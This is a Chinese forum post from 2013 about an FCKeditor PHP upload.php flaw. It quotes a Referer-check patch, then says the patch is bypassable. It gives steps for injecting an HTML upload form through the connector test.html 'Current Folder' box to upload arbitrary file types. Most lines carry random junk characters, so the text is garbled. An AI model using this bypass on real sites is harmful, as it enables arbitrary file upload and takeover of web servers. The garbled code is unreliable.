漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
# B' [) I) A9 ?5 K$ o1 t/ y网上给出的修复方案是) l3 k* J% W4 }: D" Y) k. K, k3 B
修复方法,删除FCK编辑器用其他的编辑器5 L- P5 R2 Z1 j6 V
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
# ]* Y$ m6 _; C3 q0 r在
: Q4 y- S3 d, m+ n |require(‘config.php’);/ j- }3 d1 ?7 o7 r: y5 ^
require(‘util.php’);. x1 M9 L# ^# j" G$ {
的下面添加以下代码—————————–5 H; A( B4 K2 |" X- G/ z$ M, u
//防止外部提交
- x0 M4 B) ]7 W. O: Z. _( d* i0 F8 wfunction outsidepost()
# r0 W9 j( {' T8 W2 D: z7 P{
' v: E" D) j$ a/ H$servername=$_SERVER['SERVER_NAME'];7 I, C3 L) \* D
$sub_from=@$_SERVER['HTTP_REFERER'];
& L9 `, l% o$ B+ b+ i, N% W) {+ s$sub_len=strlen($servername);
$ Q# m* Q8 y- f; p( c9 X$checkfrom=substr($sub_from,7,$sub_len);' y1 R \! D/ |% |6 D, R
if($checkfrom!=$servername){- B9 i- R. n9 C; w4 X6 W
echo(“you don’t outsidepost!”);
$ u$ C+ O' x) [/ }* Fexit;
3 K4 [8 a7 Y2 O" `, @}
a" k* [/ c4 {; U$ a8 t" R}
4 G/ H) E! x* T9 poutsidepost();( z+ [# {: G; y# R& d1 o8 N
防止外部提交,但是没有防止内部提交,
3 u" N2 @- Z1 R( y$ B利用方法:. z8 w6 L8 y: n" n$ d8 T* S
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html# K G2 v- L. E2 t+ I, {) ~7 j
2,在Current Folder 框输入8 r3 E2 `/ @$ |! I+ T8 Q
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>- U, }3 b8 F7 [- {3 o
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
" _9 L$ k: C. S- a) | sPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对